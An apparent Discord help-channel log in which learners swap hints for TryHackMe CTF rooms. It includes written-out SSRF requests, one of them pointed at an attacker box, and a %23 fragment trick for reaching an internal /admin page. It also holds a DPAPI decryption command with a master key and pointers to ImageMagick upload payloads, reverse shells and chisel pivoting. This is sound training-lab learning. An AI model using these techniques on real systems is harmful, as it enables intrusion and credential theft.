Now im doing the Madness ctf room . oh boi im not able to fix this ||png|| file . tried giving the correct ||IHDR chunk value|| but that doesnt seem to work.

Tried this room a couple of times, but having a hard time with JS. Will probably do a couple of Intro to JS rooms and get back on this one.

That is a fun one. Have you tried running || file || on that one?

there's no need of JS knowledge in this room!

yh also did ||pngcheck|| . its something about the ||chunk value|| why im not following. edit: nvm understood where im doing wrong..such a stupid iam .

Is that so? I'll take a look again when I get the chance.

Did you get the water type?

locate water-type.txt

asking me? yes! also i made it to the end. 🙌

So, just Madness?

yup..but it seems im progressing. i'll ping if there's anything.

https://tryhackme.com/r/room/owasptop102021
task 11
hint says Is there any security question that can be easily guessed? which obviously means What's your favourite colour?, right? I ran a sniper attack with Burp's Intruder and a wordlist of ~200 lowercase colors, and got nothing. What am I missing?

It is the colors and it's not an obscure one. You muts be doing something wrong with Burp or interpreting the results wrong.

I manually went through the responses, Location header was always the same, leading to the same page, so I'd say that should be accurate.
I now tried with wfuzz too, no luck.
I used this color wordlist's first column:
https://github.com/codebrainz/color-names/blob/master/output/colors.csv

Take the ten most obvious colors you can think of and try it manually, no tools

I can't spontaneously tell you why it didn/t work with burp and wfuzz

ok i know why it doesnt work

the wordlist doesn't contain the right color

as far as i see

It has 81 colors that contain the correct color, with all sorts of quirky qualifiers, but never the actual, plain color every child knows

I was hoping exactly that wouldn't happen lol, I'll try

Unless I missed it, which is possible.

I mean, sacramento_state_green, ufo_green, screaming_green, who comes up with that stuff...

green_color_wheel_x11_green oO

oh really... I tried red, green, blue the first time, but I guess when it reloaded the page, I didn't reselect the color question silly me, thanks @ruby creek 😄

Gave 1 Rep to cyberterms (current: #254 - 20)

about wfuzz/Burp not working, I bet it's because I didn't copy the PHPSESSID cookie after entering joseph

learned something today then 👍

What I can do now from here? 🤔

Any hint.. please.. little also

What service is running on port 80 and how do you typically interact with that service?

It might be too early for you to attempt this if you have this question, no offense.

I don't mean 80.. ofcz.. it's http.. ohh man I forgot to make a box inside it.. wait

ahh now it's ok

I am doing

https://tryhackme.com/r/room/picklerick

this room

and i saw source code and /assest directory and also robots.txt and got somethings.. but I don't know what to do next so I was trying to do ssh connection

and I am not able to connect ssh as it says something like public key

You don't interact with the SSH in Picklerick.

That's for the room dev.

please delete my comment if I revealed anything related to ctf

oh ohk.. thanks for the hint.. 😓 this also helps me a lot

Gave +1 Rep to @lucid junco (current: #1 - 2313)

The ssh host keys you highlighted in your screenshot are irrelevant in 99.99% of cases. You're unlikely to ever do anything with them.

And I have not that much knowledge yet to do anything with them 😓 can you teach me?

They are there to identify the server to you. So that you know you're connecting to the right server and not that of an attacker. When you connect to a server for the first time, your local machine writes the server's "fingerprint" in the "known_hosts" file. If you connect to the server again it checks that file and warns you if the fingerprint changed. That could indicate a man-in-the-middle attack.

In terms of "doing anything with them": Not really.

Wow thank you so much.. I didn't know that.. 🙂

Gave +1 Rep to @ruby creek (current: #230 - 23)

HI im doing static malware analysis for the malbuster room.
im trying to view one specific header value - am i looking at the wrong place? i have tried checking the data type manager as well to match with any other field but kinda lost

alright got it! it was in the address being changed by the malware.

https://tryhackme.com/r/room/owasptop102021
Task 22 - SSRF
I was hoping the server's GET request to my box, when responded with a redirect, would show the admin site, but it instead just returned an empty PDF... :/ any tips what to look for?

the request I tried:
GET /download?server=http://attacker-box:9001&id=75482342
then I'd paste this redirect to the running nc:

HTTP/1.1 301 Moved Permanently
Server: nginx
Connection: close
Content-Length: 0
Location: http://127.0.0.1/admin

which returns the empty PDF

just an idea: Have you tried URL encoding the part after GET?

I don't think that's necessary because the GET request was processed just fine

[this](#878393611929129000 message) says the PDF file should be enough, because it's supposed to access an internal resource which it presumably does, but I'm not so sure

oh so I found the answer [here](#room-help message) ... ||http://10.10.207.210:8087/download?server=localhost:8087/admin%23&id=75482342 - the important thing is %23 - #|| but I don't get why...

So I wasn't that far off

oh I know why! ||the hash sign is used as a HTML fragment, so when the URL is filled by this code: crl.setopt(crl.URL, server + '/public-docs-k057230990384293/' + filename) it becomes localhost:8087/admin#/public-docs-k... which accesses the /admin endpoint 💡||

I wasn't aware of the HTML feature I mentioned above, that's like completely random given the task 🙂

@magic coral in case you still wonder about the reason ⬆️

You'll probably never forget after this, I'd count that as a success

there is a flag to find https://tryhackme.com/r/room/redteamfundamentals

Task 6?

You need to follow along with the static site.

Yes the task 6

Yes I have tried but can't find

You keep clicking, at the end the flag is at the bottom of the page.

Great 😃

Found it?

For sure

Yes

So excited

I am now able to go next

Thanku

Thanku

The last 2 questions for ToolRus
I'm stuck on the last 2 questions trying to figure out how to exploit the box to gain shell access. Any hints in the right direction to focus on would be awesome!
https://tryhackme.com/r/room/toolsrus

NM looks like I just figured it out seems I needed to step away for a day haha

I'm working on Road (https://tryhackme.com/r/room/road) and was wondering if any one could give a nudge? I've been tinkering with ||/usr/bin/sky_backup_utility|| and still haven't figured out how to escalate privileges into || webdeveloper ||.

Enumerated any databases?

Yes, I got the application credentials for the ||admin@sky.thm|| user

What about ||mongodb|| ?

Tried the password, but it didn't work. I also saw one password purporting to be a secure one, but didn't work as well.

Oh.. this one I have yet to try.. Let me take a look. Thanks.

Gave +1 Rep to @lucid junco (current: #1 - 2347)

Appreciate the assistance @lucid junco! Not sure why it didn't occur to me to check that one although it was probably because it was my first time encountering it in a ctf.

Gave 1 Rep to .scrubz. (current: #1 - 2348)

anyone good at command line searching event logs? i need a hand to get to the answers for Windows Events Log room

this stuff has way toooooo many options

so the question goes like this
'A Log clear event was recorded. What is the 'Event Record ID'?'

can't seem to find my way in searching for it correctly

this is concerning room Windows Event Logs

I haven't done the room yet, but as I understand of Windows event logs, certain activities have event IDs like 4625 corresponds to login failures. Have you tried to do a Google search for it?

eventually i googled some event id's and found what i needed, but i was under the impression you had to find out via command line Get-Winevent

so i kept being stuck for a long time, but then deciding to move on and googling for the id's which gave me enough to progress further

Heeeeey

Hints are allowed for airplane room ?

I need some too. 😄

Seems I am in a rabbit hole ^^ or I'm missing something

I can give you a bit of hint, but I'm kinda at the beginning 😄

I'm already into this

Have you got any further?

i'm ok with the first vuln

I got two usernames. In that case could you give me a hint ? 😄

I have some informations an got some files. I could do a thing if I have access to a particular function if you understand what I mean

have those too

I'm stuck here 😄

tryin to brute force ssh

I don't think we need to bruteforce it :/

yeah you're probably right 😄

any hints?

Sent you a dm

Not in the first 72 hours after release of the room.

Ok thanks 🙂

Gave +1 Rep to @ruby creek (current: #85 - 76)

Please ask before you DM users.

Sorry 😦

hey I'm having a problem with this question in room Red Team Engagements on task 3:

What is the first access type mentioned in the document?

Are you using the document on the static site?

Yes unable to download attachment

Is your browser blocking it?

Correct, called it a 'dangerous download'

It's ok, it's a false positive.

Got it! thanks

I need a little nudge in the right direction or hint. I am doing "Chill Hack" I have a shell and have done "sudo -l" but I am not sure what to do with that information. It says nopassword but that file is already world readable. Sorry I am not giving to many specifics I don't know how much info is ok to post I don't want to ruin it for someone else.

You're on the right track with your findings.

Continue by investigating the code in that file. Could it be vulnerable?

Thank you! I have one question about that vulnerable as in changing the code or using it as is? I ask because if it is using it as is then I know I need to do some learning to better understand what is there and how it actually works vs how I think it works.

Gave +1 Rep to @ruby creek (current: #64 - 109)

As is.

Thanks! I will sit down with it tonight and see what I can learn.

Gave +1 Rep to @ruby creek (current: #63 - 112)

Did you figure it out?

Yah I got there eventually. learned a lot. sadly the privesc kicked my but

That was a fun one, I had the most trouble in the initial access or filtering aspect of it. 😅

I had to go through a right up and still had some trouble fully understanding it.

I'm now on Gotta Catch'em All! currently working on privesc. It's an area I need to work at

Oohh.. that one.. I'm stuck at the initial access or foothold part. 😅 Haven't had the chance to go back as I recently moved jobs and catching up on a bunch of stuff.

it's fun I am enjoying it. I have been doing a little here and there as I have time

Is there a way to just pick up where you left off for the last clocky answer? really don't want to start all the way over.

If you terminate a machine no, the progress will reset.

@lucid junco Gotcha, the last part is kicking me hard lol.

I am looking for a hint to point me in the right direction in "Gallery" I am stuck trying to find the admin password hash though I already have the next flag and am on the box with a reverse shell and have switched users already. I just cant seem to figure out where to find the hash. Any advice would be greatly appreciated

Have you tried exploring the || database ||?

Yes and know. I am aware that there is one just haven't figured out exactly how to view it. I assume through sql injection and will have to do more research on the topic and how to get it to do what I want.

also how did you black that out until I click on it? that seems like a good thing to learn I am scared of saying to much when I ask for help. I don't want to ruin things for other people.

If you surround text between double-pipes "|" it becomes a spoiler.

||like this||

Disclaimer: I can't remember doing the room myself. ||But SQLi when you already got a shell is less likely than that there's maybe a database server listening to connections from localhost running on the machine.||

Running || linpeas || or || lse || should lead you to the next steps. 😀

Thanks I think that will help

Gave +1 Rep to @tropic garden (current: #11 - 583)

Hey anyone up

Just shoot in your question and someone will surely get back to you provided it is within THM discord rules.

How to abuse /usr/bin/** to get root in mkingdom

Oh.. this one might be better posted in #1251235113803714590

K

Source Code Security Task 8 Secret management. I struggle to find the hidden flag, even though I think it stares you in the eye as you know it... but where?

Been at /r/room/relevant for an hour and haven't been able to find anything other than it's a Windows machine with IIS, SMB/NetBIOS and RDP

No dir's found on web, no smb or rdp exploits

So far found SMBDomain RELEVANT and probably Windows Server 2016

Will check UDP next, but almost out of ideas

no smb or rdp exploits

Are you sure?

i did check the more recent ones, i didn't check the 2012 and earlier ones. ill check again in abit. taking a break for lunch 😛

Got it 🙂

I also read the hint in the source code, but I can't figure out which "console" it's about.🤷‍♂️
The room is "pokemon".
Who knows where this console is hidden?
||If we are talking about the console in the browser's "developer tools", then there are just Pokemon names, there is nothing else interesting.||

The console is the browser.

Are you sure?

Or is it a rabbithole? ;p

There is a code there, but I haven't figured out how it helps to get a foothold on the machine yet.
If I'm only going in the right direction. Maybe I have the wrong vector of thought on how to exploit this.🤔

Have you checked the source code of the website?

^

Yes, there was a hint about the console.

Can you take a sfreenshkr of that area?

Yeah. You're missing it, would you like a hint?

@chrome helm

I'll try to think about it.
Not yet, I want to figure it out for myself (if it's obvious))

It really is. 😄

[It's in that screenshot]

I'm stuck in that same step. 😅

I've looked at the console and played around with the code though I've yet to make sense of it.

Do you want a hint?

Lol

Maybe I'll give it one last attempt when I get the chance and let you know. I'm still playing catchup with work and a bunch of training hours I need to complete this weekend.

I took a fresh look at the source code.
I had an epiphany.😅
@lucid juncoThanks, I was blind

I can't for the life of me seem to access this folder from powershell.

I own it. I can write to it, list it, move it, try it somewhere else.

But no matter what i cant read any file from powershell

I've tried using the example commands byte for byte ... and still the error persists

Figured it out

apparently just don't specify any path at all

and suddenly it can access it

Ahoi! I want to solve the optional SSRF in Task 22 for owasptop102021. Though I'm not sure in which direction to head or if I'm on the wrong track. I'm wondering if I should take a closer look on how to get the Werkzeug PIN when forcing a stacktrace. Please give me a nudge 🙂

You will have to use the existing SSRF vulnerability that you used before. Focus on the fact that the admin page can only be accesed from localhost

Thanks @lapis pond I'm really at loss here. I don't know how the admin page actually checks for localhost. I know from the previous task how to direct traffic to a different server, but don't see how that helps. I now tried to use the machine as its own target but this also just generates the pdf downloads with either the resume or a 404 if I try different ids or append /admin to the server param. I don't see how to manipulate the id param as it needs to be an int or the page throws an exception and I don't think I should follow the Werkzeug path.
I know that the request for /download would end up in /admin/public-docs-k057230990384293/ but still... I'm just stuck or blind or

Gave +1 Rep to @lapis pond (current: #106 - 62)

It's not an easy one per se that's why it's a bonus question and you don't need it to finish the room. You could either come back at it later when you have more knowledge. Or if you want more than a hint/nudge we could take it to #room-help

Would love that. I'll take a few more minutes. Currently reading up on different formats to use in a ssrf and want to see what I can gather. I'll ping back!

I really can't make any sense of it.

Sometiem you can find credentials separated by a colon....

||<username>:<password> without the <> ||

Check the source code again.

oh come on!!! I was too focused on the || console ||.

You probably glossed over it too many times.

Yeah... saw it multiple times, but was misdirected 😂

Now you'll speed through it. That's the hardest part

I'll let you know how it turns out. Had to stop doing THM staff to catch up on work. 😭

How can I login with a non-ascii character in the password...

I can't type it, I can't pass it in shell or as a variable.

It contains a hex(200) and a ( which seems to be enough to break any quote system I can find

Has anyone actually ever used this or seen this in production? I can't imagine anyone would set a password to something that could never be typed.

managed to get in, but not by using that password, that's ridiculous.

In which room did you encounter this?

/r/corp i believe

Oh.. haven't done that one yet.

https://www.twitch.tv/videos/2186098630

around the 1hr mark

Tell me what I'm doing wrong.
room - magician
There are a bunch of examples of how to create a payload in the form of a downloadable file.
I do various checks on the POC, but none of them work.
Is there a need for a different approach to the exploit or something else?

Are you trying to get access?

^

Yes, rce.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload Insecure Files/Picture ImageMagick

Maybe my code itself is not correct.
I have to upload the file and wait for the service to process it.
The malicious code is triggered and I get what was in the code.
I don't have to open the file from the site myself?

apparently, I'm doing something wrong.
or I need to edit these files in some other way.
not a single file wants to work.
I'm adding magic bytes and no bytes.
I downloaded ready-made exploits.
They don't work either.
Who passed this box, write in a personal account how you decided it.
I don't want to read a ready-made step-by-step walkthrough of a "easy" box, where they will give a ready-made solution, I want to understand how it works on its own.🙏

re: Dead End, is it old enough now to ask what the service or application that indexed the vulnerability we are looking for. and NOT the key itself I've spent a really long time looking at the registry keys on the vm and still haven't found what i'm looking for.

Original question: What is the full registry path where the existence of the binary above is confirmed?

@chrome helm How are you editing/entering the data for the poc exploits?

like vi on attackbox?

open page with poc, then file save-as in browser?

I experimented with the provided "Simple reverse shell" that is on github and I managed to catch the shell!
Thanks)

Gave +1 Rep to @fleet pike (current: #641 - 6)

But now I'm trying to get root and I haven't figured out which direction to go in yet.😕 (room - magician)

Linpeas?

Yeah, I did.
I'll try to check the output again more carefully.
(the only thing that got me hooked there was this)

What's running on port 6666? 😉

But pivoting didn't give me access to the site. And there is little information locally through curl.)
I will try to think in this direction if I have chosen the right vector)

Have you ever used chisel ?

yeah

Good, that's your hint. 🙂

I've yet to get the fire pokemon flag, but not ready to give up yet.

I'm not sure if I'm missing something obvious again. 🤣

It's hidden in there, you'll find it.

Yeah, I'm scouring the lse and linpeas output line by line. 🤣

Hello

In the Network Services Room under Task 4 (Exploiting SMB), the question is: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?

Can anyone give a hint what to look for? I have found the ssh private and public keys from the .ssh folder

You found a text file that was signed with a name. This is your clue for the username.

is it cactus?

Or is it cactus@polosmb?

You could try both, but an extra @ in an username for ssh seems like it could cause problems.

it's cactus

|| Spoiler!!! this is hints not help. ||

Got it, thank you

Gave +1 Rep to @lapis pond (current: #92 - 71)

I was stuck because I forgot to move and place the id_rsa file into the .ssh folder and then initiate the ssh connection

After moving it into the folder it worked

ON OSIRIS:
SPOILER ALERT!
I've substituted the old masterkey with the new one, then when i go and use it to decrypt the blobs around:

||C:\windows\temp\CQDPAPIBlobDecrypter.exe --master=9F9C0C578D5546FD08834375F1443E5B55400BF93EEA53CCE3BECA8690BBEFCD547B4EAA8E9B092D3D5C8D37842EFB46D874AB9A2EA852B0966EBA9AA8B20298 --entropy=DE135B5F18A34670B2572429698898E6 --blobfile=C:\Users\chajoh\AppData\Roaming\Microsoft\Protect\S-1-5-21-555431066-3599073733-176599750-1125\BK-WINDCORP --outfile=C:\windows\temp\BK-WINDCORP.txt --golden=C:\windows\temp\DKM.pfx||
There's something wrong with provided masterkey, try again!

CAN somebody give me a hint about it? please?? these CQDPAPI* tools are getting me crazy xD

why this output:
There's something wrong with provided masterkey, try again!
it doesn't seem to me that there is something wrong with it...

Hi I’m doing the pickle Rick room and I tried running gobuster to find hidden directories but all the requests are canceled. Could anyone explain why it is happening and if I can fix it ?

Looks like it can't get a connection

I don’t understand why though, i was able to run dirb without trouble

.

@white salmon yes said script is related to the path too root... but as you probably have noticed you can not edit it.... check for things that run multiple times on the target machine

alright thanks!

Gave +1 Rep to @alpine kestrel (current: #4 - 1817)

no problem

Verify the target URL.
Check if the wordlist file exists at the specified path

???

No matter how hard I try I can never finish a CTF without reading a writeup..
I almost feel like it's too hard for me.

I read the script and thought of rewriting the base64 binary. so I ran which base64 and found it, but i had no permissions to edit it

So I gave up and checked a writeup, and the solution was editing base64.py
Idk how was I supposed to know that base64.py is used instead of the base64 in /usr/bin/base64

I just dont get the same ideas as you guys.

because the script is a python script so it uses a python library

still you are making progress

Yeah but my brain thought if which base64 returned some binary, thats the one its using

its just hard..

I hope so

You already understand more than most of the rest of the world when it comes to problem solving, it's hard. Sometimes seemingly impossible. But as researchers / hackers / security people, that's the game.